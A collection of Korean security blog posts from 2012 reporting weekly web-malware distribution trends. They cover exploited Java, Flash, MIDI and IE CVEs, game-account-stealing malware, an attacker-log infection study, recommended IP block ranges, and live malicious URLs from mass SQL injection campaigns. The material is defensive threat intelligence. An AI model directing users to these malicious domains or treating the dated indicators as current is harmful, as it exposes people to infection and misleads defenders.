    금주의 차단 추가 영역은 다음과 같습니다아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다기업 및 기관에서는 해당 IP 대역 차단이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.

     

    4월부터 차단 권고 드린 IP 대역은 금주에도 매우 활발하게 재활용이 되었습니다강력한 차단을 계속 유지 하셔야만 안정성을 확보   있습니다.

     


    차단 권고 대역


    * 본 게시물에서는 차단 대역의 게재를 하지 않으며 서비스 제공 받는 고객사에만 제공이 됩니다.




    현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공할 예정이며 기본 동향에 대해서만 언론에 브리핑 될 예정이니 참고 하십시요중앙대 전산원 기사http://www.dailysecu.com/news_view.php?article_id=2251 와 연관된 내용인 abcmart 의 기사가 보안뉴스에 게재 (http://www.boannews.com/media/view.asp?idx=31441 )  되어 있으나 해킹 및 가격 오류 소동에 관해 해킹이 아니라는 해명을 하고 있습니다. 저희쪽에 관련 사례가 있어서 정리 되는 대로 기사 기고 예정입니다참고 하십시요.

     

     

    시설 확장을 통해 그 동안 국내 도메인 중 추가 확보된 도메인과 해외 도메인을 더 추가하여 악성링크의 움직임에 대해 폭넓은 관찰을 현재 실시하고 있습니다보다 더 정확성 있고 현실적인 위협정보들을 제공 할 수 있도록 하겠습니다.

     

     

    *시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4 이상을 보고서를 받으셨다면  이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다.  

    첨부 파일중 KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다해당 서비스의 신청은 csyong95@kaist.ac.kr  신청 하시면 됩니다.

     

    정식 구독 서비스 가입  시범 서비스 신청은 info@bitscan.co.kr 이며 기관명담당자연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다주위의 기업  기관들에게 정보 차원의 전달 가능합니다.

     

     분석은 악성링크 자체의 수집은 빛스캔에서 수행하며악성링크에 분석은 KAIST 사이버보안센터정보보호대학원과 공동으로 진행합니다.


    - 바다란 세상 가장 낮은 곳의 또 다른 이름.

    Posted by 바다란

    5 3주차 국내 인터넷 위협 동향입니다.

     

    서비스의 제공은 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 있도록 하기 위한 것이 주된 목적입니다.

     

    금주의 특징으로는 공격에 이용되는 취약성 종류의 변화에 따라 공격 기법들도 변화가 되고 있음을 있으며, 가장 특징은 신규 악성링크는 줄어든 비율을 보이고 있으나, 악성링크로부터 감염이 되는 악성코드들은 전주 대비 대폭 증가 되었습니다결론적으로 보면 지금까지 사용 되어진 악성링크들을 반복해서 재활용을 하고 있으며 최종 설치되는 악성코드들만 변경하는 형태를 보이고 있습니다.  대응이 되지 않고 있어서 계속 악성링크를 재활용 하고 있다는 가장 원인이 것입니다.

     

    금주의 특징은 다음과 같습니다.

     

     

    특징

     

    ·   악성코드 유포자들의 전략적 행위 증가 범위 확대

    ·   악성코드 분석 자체를 방해하기 위한 가상머신 우회기술 적용

    ·   4월부터 사용되었던 주요 악성링크의 대규모 재활용 계속

    ·   주말에 집중된 공격에서 벗어나 주중에도 일상적인 악성코드 유포 시도들이 계속 이어짐

    ·   악성링크 탐지 혼선을 위한 백신과 유사한 도메인 활용 배너 

    ·   APT 유형 ( 악성 코드 감염 이후 내부망 스캔 활동) 꾸준히 유포

    ·  Mass sql i 유형 국내 유입 시작social-stats.info/ur.php 5.19 ( 해외에는 있었으나 국내로 최초 유입이 감지됨)

     

    5 3주차의 공격에 이용된 취약성들을 전주와 비교해 보면 공격자들의 전략과 악성코드 전파 기법의 변화에 대해서 확인이 가능합니다.

    금주의 주된 공격 취약성은  주요 취약성 6 가량에 집중이 되어 있으며 이중 여전히 패치가 더딘 것으로 보이는 Oracle Java 취약성에 대한 공격 비율이 높아지고 있는 있습니다. 사내 해당 기관이나 기업에 강력한 보안패치 권고를 해야만 하는 이유입니다. MS 패치뿐 아니라 java Flash 대한 기본 패치 정보를 제공하고 타이트 하게 관리 해야 위험을 줄일 있을 것입니다.

     

    특징들을 하나씩 짚어 보면 가장 특징은 전략적 움직임을 공격그룹이 보이고 있다는 부분입니다.

     

    ·  전략적 변화를 하는 공격자들

    악성링크의 수치는 줄었지만 기존에 정상적인 웹서비스들에 추가해둔 악성링크 ( 악성코드는 내려 오지 않는 비정상 링크 ) 대규모로 활용 하였고 그중 한곳의 경우에는 분석보고서에는 정황이 기술되어 있지만 빛스캔에서 관찰되는 변화를 보면 대규모 움직임을 보이고 있습니다.   하나의 악성링크를 이용하여 대규모로 악성코드 유포에 활용 하고 있으며 이전 사용 되었던 링크들의 재사용 비율이 대폭 증가하고 있습니다. 대응이 시급한 상황입니다.

     

    말로서는 설명이 어려워 그림으로 보면 다음과 같습니다.

     

    1. 공격자는 사전에 악성링크 A B,C 여러 서비스들에 넣어 둡니다. 이때에는 악성코드 유포는 발생하지 않습니다. ( 빛스캔 관측결과 최소 4 이상의 사전에 심어진 악성링크 활동이 감지 되었으며 해당 링크의 내용은 공격 시작과 동시에 동일한 악성코드 호스팅 주소로 변경이 되었습니다. - 최소 연결된 공격네트워크만 40여곳 이상이 해당 되는걸로 감지 되고 있습니다.)

     

    2. 공격 시점에 도달 하여서 공격자는 악성링크 A B, C 내용을  악성링크로 변경 합니다.

     

    3. 이미 공격자가 확보하여 가지고 있는 악성코드 유포 네트워크( 최소 수십여개 이상 ) 하나의 악성링크를 방문자들에게 중계하게 됩니다.

     



     

    ·  백신 도메인으로 가장한 형태의 악성링크 발견  (ky.alyacc.com )

    ·  시스템 드라이버를 대체하는 형태의 루트킷은 APT 형태이며 감염 이후 내부망을 스캔하고 정보를 수집하는 형태를 보이고 있습니다. 해당 형태는 몇주간 계속해서 나타나고 있어서 강도 높은 주의가 필요합니다.

    ·  악성코드 분석시에는 항상 가상머신을 이용하여 분석을 진행하고 있습니다만 금주에 발견된 악성코드 중에는 가상머신 실행을 감지하고 종료하거나 분석을 회피하도록 설계된 악성코드가 대량 유포 되었습니다. 내용은 향후 전문분석을 통해 상세하게 전달이 예정입니다.

    ·  게임 계정을 해킹 하는 코드들이 대량으로 유포 되고 있으며 대상 게임은  엔씨 -리니지 , 한게임 -테라 , 넥슨 -메이플스토리,엘소드, 블리자드-와우, CJ인터넷 - 피파온라인, 네오플-던파 이며 디아블로에 대한 계정 탈취 유형도 발견 것으로 보입니다.

    ·  항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발 있으므로 심각한 주의가 필요합니다. 더군다나 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 감염입니다.  APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다.  대응에 참고 하십시요.

     

    사용된 취약성

     

    - CVE 2011-3544 ( 26.4%)  Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

    - CVE 2012-0507 ( 24.5%) Java Applet 취약성 - Java Web start 취약성

    - CVE 2012-0003 ( 20.7%) Windows Midi 취약성http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고 

    - CVE 2012-0754 (16.9%)  Flash 취약성http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

    - CVE 2010-0806 (10.3%)  IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

    - CVE 2011-2140 (0.9%)   Flash 취약성  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2140

     

     

    전주 대비 특이 사항으로는 Java applet 취약성을 노린 공격이 대폭 증가 하였고 한동안 소강 상태를 보였던 Windows Midi 관련된 공격이 급증세를 보이고 있습니다.또한 오랜된 취약성으로 분류되고 있는 IE 취약성 CVE-2010-0806 공격이 드물게 활성화 되어 이용이 되고 있습니다. MS 관련 보안패치 Oracle, Flash 업데이트를 시급하게 보완해야 부분이며 불가피한 경우 현재 공격에 주로 이용 되고 있는 취약성들에 대해서만이라도 패치를 별도 설치 하도록 유도해야 위험을 줄일 있습니다.

     

    전주와 대비해 달라진 취약성 비율과 공격의 자세한 변화들에 대해서는 5 3주차 동향분석 보고서를 참고 하십시요.

     

     

    금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 기관에서는 해당 IP 대역 차단이후 ( 업무 관련성 여부에 대해서는 각기관 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 있으시며 매우 높은 수치임을 아실 있습니다.

     

     

     

    차단 권고 대역

     

     

    서비스를 구독 하고 계시는 기업 기관에게는 메일 상에 적어 드렸으며 4월부터 5 2주차까지의 차단 영역은 그대로 유지, 금주에 추가된 영역은 2 클래스가 추가 되었습니다.

     

     

    현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공할 예정이며 기본 동향에 대해서만 알려 드립니다.

    시설 확장을 통해 동안 국내 도메인 추가 확보된 도메인과 해외 도메인을 추가하여 악성링크의 움직임에 대해 폭넓은 관찰을 예정하고 있습니다. 보다 정확성 있고 현실적인 위협정보들을 제공 있도록 하겠습니다.

     

    *시범 서비스는 순차적으로 1개월 경과시 종료 됩니다.

    * 정식 구독 서비스 가입 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한하여 한달간 제공 됩니다.

     

    * 분석은 악성링크 자체의 수집은 빛스캔에서 수행하며, 악성링크에 분석은 KAIST 사이버보안센터,  KAIST 정보보호대학원과 공동협력으로 운영 되고 있습니다.

     



    < 5 3주차 주간 동향 요약 보고서>

    Posted by 바다란




    안녕하세요. 전상훈입니다.


    금주의 동향에 대해 총평을 하면 전주 대비 사용자가 직접 노출되는 유포지 수치는 대폭 증가된 형태를 보이고 있습니다. 활발하게 악성코드 유포를 시도하고 있으며 전주까지 사용 되었던 악성링크도 대거 재활용이 되고 있는 상태로서 신규 악성코드 또한 증가된 현황을 보이고 있습니다.
    공격을 당한 곳들도 증가하고 있으며 전주에도 언급 하였지만 위협이 줄어든 것이 아니라 대응이 되지 않는 상태이다 보니 계속적인 악성링크의 재활용과 신규 유형들이 유입이 되고 있습니다.

    전주까지 확연하게 증가추세를 보였던 Java Applet 취약성 ( CVE 2012-0507, 2011-3544)은 계속 진행 되고 있으며 금주의 공격 부분에는 Flash 취약성 (CVE-2012-0754) 공격코드들도 증가를 하고 있습니다. 

    현재의 상태로 보면 운영체제에 대한 직접적인 취약성 공격은 빈도가 약해지고 있으며 상대적으로 보안대응이 늦을 수 밖에 없는 Third party application에 대한 공격비율이 매우 높은 것을 볼 수 있습니다. 운영체제의 경우 자동업데이트등을 이용하여 보안성을 일정수준 이상 유지 할 수 있으나 현재까지는 Third party 제품군에 대한 자동업데이트는 그리 활발하지 않은 상황이라 공격 비율이 높아 보입니다.

    사내 및 관련부서에 Adobe의 Flash 및 Oracle Java 관련된 취약성의 업데이트를 강력하게 권고를 하셔야 될 상황이며 향후에도 계속적인 관리 포인트를 두셔야 할 것입니다.  Flash 최신 버전의 경우에는 자동업데이트 지원이 되고 있으므로 적용을 권고하고 패치가 매우 늦은 Oracle의 경우는 즉시적인 권고를 통해 바로잡아야 합니다. 

    모든 내부사용자가 인터넷을 이용하지 않는다면 문제가 되지 않습니다만, 현재의 상황은 불가능한 상황이므로 인터넷 상에서 노출되는 위험으로 부터 보호 할 수 있는 방안을 자체적으로 강구해야만 하는 상황입니다. 상대적으로 보안성이 강력한 사이트의 경우에도 배너 및 태그 광고등을 통해 악성코드들이 지속적으로 유입되고 있습니다.  짧게 노출 시키는 것을 계속 반복하는 상황이며 광고의 특성상 수십여개 이상의 사이트에서 동시에 악성코드 유포 효과를 볼 수 있는 형태라 강도높은 주의가 필요합니다.


    특징: 

    - 백신 미탐지 악성코드 유형 대거 출현 (국내외 막론하고 동일합니다.)
    - CVE 2012-0507 , CVE 2011-3544 ( Java Applet 신규 취약성) 공격 지속 및 CVE 2012-0754 (Flash 취약성) 공격 증가 
    - 해외 호스팅 영역을 통한 IP 변경된 공격 지속 및 대학 서비스 중계지 활용 계속
    - APT 유형의 드라이버 루트킷 재출현 ( 감염이후 192.168. 대역에 대한 스캔 및 확인 기능) , 국내외 유명게임들의 다수 계정 탈취
    - 이전 출현 하였던 악성링크의 재활용 계속 증가 ( 심각한 상황입니다.)
    - 배너, 태그 광고 링크에 대한 공격 지속  ( 태그 광고 1곳, 배너광고 2곳 이상)
    - Mass sql injection  최초 유형 발견 2곳 시작됨 ( 5.8일 skdjui.com/r.php , 5.13일 koklik.com/r.php )
         
    Mass sql 공격 관련 정보는 http://www.symantec.com/connect/blogs/lizamoon-mass-sql-injection-tried-and-tested-formula 이곳을 참고 하시면 됩니다.
    국내에도 빠르게 확산 되고 있으며, 2012-0507 유형이 같이 사용 되고 있으므로  사내의 임직원들에게 강력한 보안 패치 정책을 권고 해야 합니다. 

    4월 3주차 보고서에서도 웹을 통한 루트킷 ( APT 유형) 유형의 유포에 대해 알려 드렸습니다만, 보다 강화된 형태로 재출현 하였습니다. 시스템상의 드라이버를 교체하는 형태로 루트킷이 설치가 되고 있어서 사후 대응 및 처리에도 상당한 어려움이 있을 것으로 보입니다. 또한 내부 사설망을 스캔하는 형태가 발견 되어 의도가 매우 의심스러운 유형이 유포가 되고 있습니다.  키로깅 이외에 화면 캡쳐 및 녹음기능을 포함한 악성코드 유형도 발견 되었으므로 강도높은 주의가 필요합니다.
    각 기술보고서에는 외부 연결 시도를 할 경우 해당 도메인이나 IP가 각각 기술이 되어 있습니다. 해당 정보 참고하여 추적 및 대응에 참고 하실 수 있습니다.

    내부망의 사용자 PC가 한대라도 권한 획득을 당했을 경우 그 위험성은 충분히 인지하고 계실 것으로 알고 있습니다. 다양한 대책을 통해 위험을 계속 줄여 나가는 것이 현재 할 수 있는 가장 중요한 일이 아닐까 생각 됩니다.

     
    APT 유형의 악성코드 이외에 게임계정을 노리는 악성코드들이 다수 발견이 되었으며 해당 악성코드들은 윈도우즈 시스템의 시스템 DLL 파일을 변조하여 패킷 전송 시점에 정보를 가로채는 형태로 되어 있습니다. 현재 변조되는 dll은 windows socket 관련된 dll인 ws2help.dll과 safemon.dll 을 대상으로 악성기능을 하도록 변조하고 있으며 대상이 되는 게임들은 국내외 유명게임을 모두 막라하고 있으며 백신 프로세스에 대한 종료코드들도 같이 동작되고 있는 상태입니다.

    대상게임: 엔씨 -리니지 , 한게임 -테라 , 넥슨 -메이플스토리,엘소드, 블리자드-와우, CJ인터넷 - 피파온라인, 네오플-던파 


    대응:


     - Java 및 Flash 취약성 공격 코드 증가에 따라  Adobe Update 및 Oracle Java 업데이트 강력 권장
    - 해외 호스팅 영역 . 4월 3주,4주,5주차,5월 1주차 차단 권고 영역 유지 필요. - 이전 활용된 악성링크들이 계속 재활용 되고 있습니다.
    추가 차단 클래스는 다음과 같습니다. 해당 클래스들은 공격자가 전체 제어권을 가지고 있어서 지속적으로 공격에 활용할 곳으로 예정 되고 있습니다. 차단이 필요한 상황입니다. 주중에도 상시적으로 이용이 되고 있으므로 차단은 강력하게 필요합니다.
     

               205.164.7.[66-75] (USA)  - 5월 2주차 추가         
               50.117.119.0/25
                67.213.211.0/25 
    1. 211.100.253.0/24 (China)
    2. 205.164.0.0/24 (USA)
    3. 69.4.224.0/24 (USA)
    4. 209.73.156.0/24 (USA)
    5. 174.127.79.0/24 (USA)

    금주 유포지나 악성링크로 활용된 곳들은 다음과 같습니다.     
    대학 서비스 중에서는  XXX, XXX 서비스들이 악성코드 중계에 계속 활용 되었고, 팬클럽, 커뮤니티, 언론사,쇼핑몰들이 악성코드 유포에 활용 되었습니다. 언론사 및 대형 쇼핑몰등은 배너 및 태그 광고 서버를 공격하는 형태로 공격이 계속 반복되어 발생 되었으며 피해도도 높을 것으로 예상 됩니다.

    *위의 이미지의 한장짜리 요약 보고서는 무료로 받으실 수 있으며 기관/담당자/연락처 기재후 csyong95@kaist.ac.kr 로 신청 하시면 됩니다.

    * 본 보안 정보 제공 서비스의  정식 구독  가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다.

    - 바다란 세상 가장 낮은 곳의 또 다른 이름.

    Posted by 바다란

    5월 1주차 보안 정보제공 서비스는 메일로 전달이 되는 보고서들입니다. 국내.외를 통털어 확인이 어렵고 공개되지 않는 정보들에 대해 분석하고 대책을 마련할 수 있도록 제공되고 있습니다.  제가 메일로 보내는 내용에 대해서는 일부 민감한 내용을 제외하고는 정리를 해드리겠습니다. 현재 우리의 상태와 현실을 아는 기회가 되었으면 합니다.



    Mass sql injection과 같은 공개적인 공격들은 아마 본 정보제공에서 최초 공개가 될 수 있을 것이고 그외의 악의적인 링크들은 보고서들에만 기술 될 수 있어서 본 게시물에서는 공개가 불가합니다. 

    또한 보고서 상에는 악성링크로 활용이 될때에는 원칙에 따라 보고서상에 공개를 하고 있으며 국내의 서비스들이 악성링크에 이용이 된 경우에도 원칙대로 공개됩니다.



    본 서비스를 통해서 얻을 수 있는 다양한 활용은 다음과 같습니다.


    1. 업데이트에 대한 강력한 권고 ( 이번주는 Java 업데이트 입니다.)
    2. 대응을 위한 차단 정책 적용 
    3. 감염되었을 경우의 사고대응 참고 
    4. 게임사들은 고객의 계정정보 보호를 위한 다양한 기술적 보호 방안 강구. 

    위와 같은 활용들이 가능하니 적극 활용 하시기 바랍니다.




    ------------------------

    지난 주 발생 되었던 위협들에 대해 금주 정리를 해보면 예상 되었던 위협들은 그대로 진행이 되고 있습니다.다만 출현 범위는 줄어든 상태를 보이고 있습니다.

    전체적으로 공격을 당한 곳들은 동일한 수치를 보이고 있으나 분석 대상에 포함되지 않은 것은 이전에 활용 하였던 악성링크들을 대거 재활용 하는 경향을 보이고 있어서 전체적인 분석 카운트는 줄어들었습니다. 그러나 현재 상황은 위협이 줄어든 것이 아니라 대응이 되지 않는 상황이라서 자유스럽게 공격자들이 재활용을 하는 상황에 도달한 것으로 보고 있습니다.

    각 기술분석 보고서들의 분류는 공격하는 취약성 집합에 따라 분류가 되어 있고 Java applet 취약성인 2012-0507 취약성을 단독 이용 하거나 결합된 형태로 이용하는 사례가 증가하고 있습니다. 따라서 지난주 대거 출현 하였던 2012-0507에 대해 분석된 전문분석 보고서 내용을 전달 드리는 것이 바람직해 보입니다.
    기술 보고서에는 간략하게 언급이 되어 있지만 전문분석에는 디컴파일된 형태에서 기능과 역할에 대한 부분들이 분석 되어 있습니다. ( 이외에도 다양한 전문분석 부분들이 진행이 되고 있으며 완료 되는대로 순차적으로 해당 서비스 고객들에게 전달 될 예정입니다.)


    특징:
     

    - CVE 2012-0507 ( Java Applet 신규 취약성) 공격 계속
    - 해외 호스팅 영역을 통한 IP 변경된 공격 지속 관찰
    - 국내 대학의 서버를 활용한 악성코드 유포 계속, 파일 공유 및 언론사를 통한 유포시도 감소
    - 이전 출현 하였던 악성링크의 재활용 계속 증가 ( 차단이 되지 않으니 계속 활용 되고 있습니다.) 
    - 배너, 태그 광고 링크에 대한 공격 지속  ( 태그 광고 1곳, 배너광고 1곳)
    - Mass sql injection  최초 유형 발견 2곳 시작됨 ( http://uhijku.com/r.php http://uhjiku.com/r.php )
         
    Mass sql 공격 관련 정보는 http://www.symantec.com/connect/blogs/lizamoon-mass-sql-injection-tried-and-tested-formula 이곳을 참고 하시면 됩니다.
    국내에도 빠르게 확산 되고 있으며 본 메일을 작성 하는 시점에도 추가 유형이 발견 되고 있습니다. 2012-0507 유형이 같이 사용 되고 있으므로 전문분석을 참고하시고 사내의 임직원들에게 강력한 보안 패치 정책을 권고 하셔야 할 것입니다. 내부망의 사용자 PC가 한대라도 권한 획득을 당했을 경우 그 위험성은 충분히 인지하고 계실 것으로 알고 있습니다. 다양한 대책을 통해 위험을 계속 줄여 나가는 것이 현재 할 수 있는 가장 중요한 일이 아닐까 생각 됩니다.
     


    대응:
     

    - CVE 2012-0507 공격기법에 대한 전문분석 제공합니다. 단 서비스 신청된 기업/기관에 한정 합니다.
    - 해외 호스팅 영역 . 4월 3주,4주,5주차 차단 권고 영역 유지 필요. - 이전 활용된 악성링크들이 계속 재활용 되고 있습니다.

    5주차에 권고 드렸던 하기의 차단 클래스는 그대로 금주에도 발생을 하여 유지하며 추가 차단 클래스는 다음과 같습니다. 해당 클래스들은 공격자가 전체 제어권을 가지고 있어서 지속적으로 공격에 활용할 곳으로 예정 되고 있습니다. 차단이 필요한 상황입니다. 또한 저희쪽에서 이 부분을 공개할 경우 공격자들과 계속해서 숨은그림 찾기를 해야 합니다만 .. 각오하고 올리도록 하겠습니다.

     
          5월 1주차 차단 권고 대역
                50.117.119.0/25
                67.213.211.0/25 

     4월 5주차 차단 권고 대역

    1. 211.100.253.0/24 (China)
    2. 205.164.0.0/24 (USA)
    3. 69.4.224.0/24 (USA)
    4. 209.73.156.0/24 (USA)
    5. 174.127.79.0/24 (USA)

    금주 유포지나 악성링크로 활용된 곳들은 다음과 같습니다.     
    .....중략 (민감한 부분)

    또한  어린이날을 맞아 *** 사이트와 같은 곳에서 악성코드를 뿌릴 수 있도록 집중적으로 공격하여 악성코드에 감염을 시키려는 꼼꼼한 면도 공격자들은 보여주고 있습니다. 


    본 5월 1주차 정보제공 서비스에 포함된 전문분석 보고서는 향후는 서비스 프로페셔널 서비스 이상에만 제공이 되며 , 시범서비스에는 제공이 되지 않을 예정입니다. 참고하세요. 시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 받으셔야 보고서가 누락되지 않습니다.  

    * 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다.

    Posted by 바다란

     * 본 내용은 국내에서 처음으로 발견된 공격자의 악성코드 감염에 대한 성공률을 나타내는 최초의 자료이며, 현 시점의 정확한 데이터를  포함하고 있습니다. 

    하루에 좀비 PC를 몇대를 만들 수 있는지는 단지 공격자의 의지에 달렸을 뿐인 지금의 상황을 정확하게 보시길 바랍니다. 방문자 10명중 6명이 감염이 되는 지금의 시대는 말 그대로 혼란이겠죠. 겉으로는 평온해 보여도 속으로는 매우 심각한 상태인데 이제 언제든 밖으로 드러나도 이상하지 않은 상황이 되어 버렸습니다.

    우리의 인터넷의 현 주소입니다. 방문만 하여도 열에 여섯은 감염 되는 현실이 중세의 페스트가 아니고 무엇일까요? . 예전에 지디넷 컬럼으로 썼던 디지털 페스트의 현실화를 입증하는 데이터네요.

    자..그럼~
     -----------------
     

    국내의 웹 서비스를 통한 악성코드 유포와 감염에 대한 실태 – 2012 2 11일 사례 조사

    분석 기업: 빛스캔 , KAIST 정보보호대학원

     

     

    2012 1월부터 빛스캔㈜에서는 KAIST 사이버보안연구센터와 공동으로 웹 서비스상에서의 악성링크 판별과 사용자 PC에 설치되는 최종 악성코드에 대해서 분석을 진행해 오고 있다. 공동 분석을 진행 중 2012년 들어 악성코드 유포 행위가 가장 극심했던 2 11일 새벽에 공격자가 생성한 흔적(로그)을 발견하게 되었고, 이 로그에는 유포 시간대에 접속한 모든 사용자에 대한 기록들이 저장이 되어 있었다. 로그를 분석한 결과 국내에서 몇 년 전부터 꾸준하게 발생되어 오고 있는 웹서비스를 통한 악성코드 유포가 얼마나 많은 효과를 거두고 있으며 왜 지금도 멈추지 않고 계속 되고 있는지를 확인 할 수 있었다. 211일 새벽 3시간 동안 발생된 기록의 단면을 통해 국내의 악성코드 유포에 대한 피해여파와 대책의 효율성에 대해 고려해야 할 시점이다.

     

    일반적으로 공격자들은 공격의 효과와 유효성 검증을 위해 접속자에 대한 로그를 항상 유료화된 통계 사이트로 전달해 오고 있어서 공격의 효과를 대응 측면에서 판단하는 것이 매우 어렵고 공격의 전체적인 규모를 파악하는 것이 불가능하였다. 또한 여러 사이트를 동시에 해킹 하고 악성코드 유포를 시도한 이후에 통계 사이트를 통해 관리와 기록을 함으로써 공격의 효율성을 높이고 있는 상황에서 실질적인 공격의 피해와 범위를 살펴 보는 것은 사실상 불가능한 부분이라 할 수 있다.  본 분석의 결과로 국내에서 일상적으로 발생 되고 있는 웹 서비스를 통한 악성코드 유포의 심각성에 대해 환기가 되었으면 한다.
     

    <공격자들이 주로 사용하는 통계 사이트 – Referer 체크를 통해 접속자 실시간 관찰>

     

    2 10일부터 12일까지(3) 최근 몇 년 이내에 가장 큰 규모로 다양한 악성코드를 유포한 주말기간 이였으며 이 당시에 발견된 악성 링크들만 30여 종 이상이고 특히 하나의 악성링크가 50여 곳 이상의 웹서비스들에서 중계되는 사례도 발견이 된 시기이다. 이번에 발견된 공격흔적은 이 중에서도 소규모에 해당하는 서비스들을 공격하여 감염을 시킨 흔적들이며 중소 언론사 한곳과 게임 커뮤니티 사이트 두 곳의 방문자들에게만 감염이 되도록 되어 있었다. 다른 큰 규모의 공격들에 대해서도 분석이 된다면 국내의 실질적인 현실에 대해서 보다 더 정확하게 인지 할 수 있겠으나 공격자의 실수가 없다면 파악을 한다는 것은 절대적으로 불가능한 사안이다. 우리는 이 작은 사례를 통해서 국내의 IT환경에 대한 직접적인 위험을 인지해야 하며 적극적인 대책을 적용 해야만 할 시기에 직면했음을 알아야 할 것이다. 전체의 피해 사례는 더 크고 대규모 일 수 밖에 없다. 지금 이 순간에도 말이다.

     

    로그파일의 사이즈는 55M , 활성화된 시간은 2012 2 11 00:23:46 ~ 03:24:30 이며 총 3시간에 걸친 기록이다. 총 로그의 카운트는 270,384회이다.

     

    중복된 방문자를 제외한 Unique IP의 수치 통계는 다음과 같다. ( AWSTAT 활용한 통계)

     

    Summary

     

    Reported period

    Month Feb 2012

    First visit

    11 Feb 2012 - 00:23

    Last visit

    11 Feb 2012 - 03:24

     

    Unique visitors

    Number of visits

    Pages

    Hits

    Bandwidth

    Viewed traffic *

    56,995

    57,380
    (1 visits/visitor)

    125,210
    (2.18 Pages/Visit)

    126,606
    (2.2 Hits/Visit)

    1.01 GB
    (18.38 KB/Visit)

    Not viewed traffic *

    36,517

    143,776

    158.92 MB




    웹로그 27만 여개 중에서 고유 방문자는 56,995명이며 해당 방문자들은 평균 2회 가량의 페이지를 자동으로 방문한 것으로 나오고 있다.

    고유 방문자가 실제 감염 대상으로 볼 수 있으며 해당 악성링크 사이트에 존재하는 exe 파일을 제한 없이 사용자 PC에 설치된 횟수가 악성코드 감염 PC 갯수로 판단할 수 있다.



    최종 고유 방문자 대비 성공 비율은 60%선을 보이고 있다. 결론적으로 소규모 사이트 두 곳 만을 이용한 공격이며 더구나 새벽시간대의 3시간 가량의 악성링크 노출만으로도 공격 성공률 60% 34천대 이상의 좀비 PC를 확보 하고 있음을 증명하고 있다. 방문자가 더 많은 대규모 사이트들에 대한 공격도 이 시기에 동시적으로 발생 하였으므로 감염 수치는 추산하기 어려울 정도이며 놀랄 만큼 많은 대규모 좀비 PC를 확보 하고 있을 것으로 추정이 가능하다.

     유포된 악성파일 자체는 게임계정 탈취와 키로깅을 주목적으로 하고 있으며 국내 주요 백신에서는 탐지가 되지 않음을 확인 하였다. 공격 코드는 IE 버전별 Flash 취약성, IE 자체의 취약성, Windows Media Player 취약성, Oracle Java 관련 취약성이 활용 되었으며 본 로그 상에서는 Oracle Java 관련 취약성 공격 성공률은 1385회 정도를 보이고 있다. 그 외의 IE, Flash 취약성과 Windows Media Player관련 취약성 공격이 공격 성공의 대부분을 차지하고 있음을 알 수 있다.


    < 방문자의 취약성별 악성코드 감염 구조도(예시)  >

     

    사용자의 Flash 버전 및 IE의 버전, java, Windows Media player에 대한 공격코드가 각각 방문자의 PC환경에 맞추어서 공격이 발생되도록 되어 있고 최종적으로는 악성파일을 방문자 PC에 설치하여 좀비 PC로 만드는 것을 목적으로 하고 있다. 공격된 취약성의 종류는 다음과 같다.

     

    사용 취약점(CVE)

    CVE-2012-0003 MIDI Remote Code Execution Vulnerability

    CVE-2011-3544 Oracle Java Applet Rhino Script Engine Remote Code Execution

    CVE-2011-2140 Adobe Flash Player MP4 sequenceParameterSetNALUnit Vulnerability

    CVE-2010-0806 IE Remote Code Execution Vulnerability

     

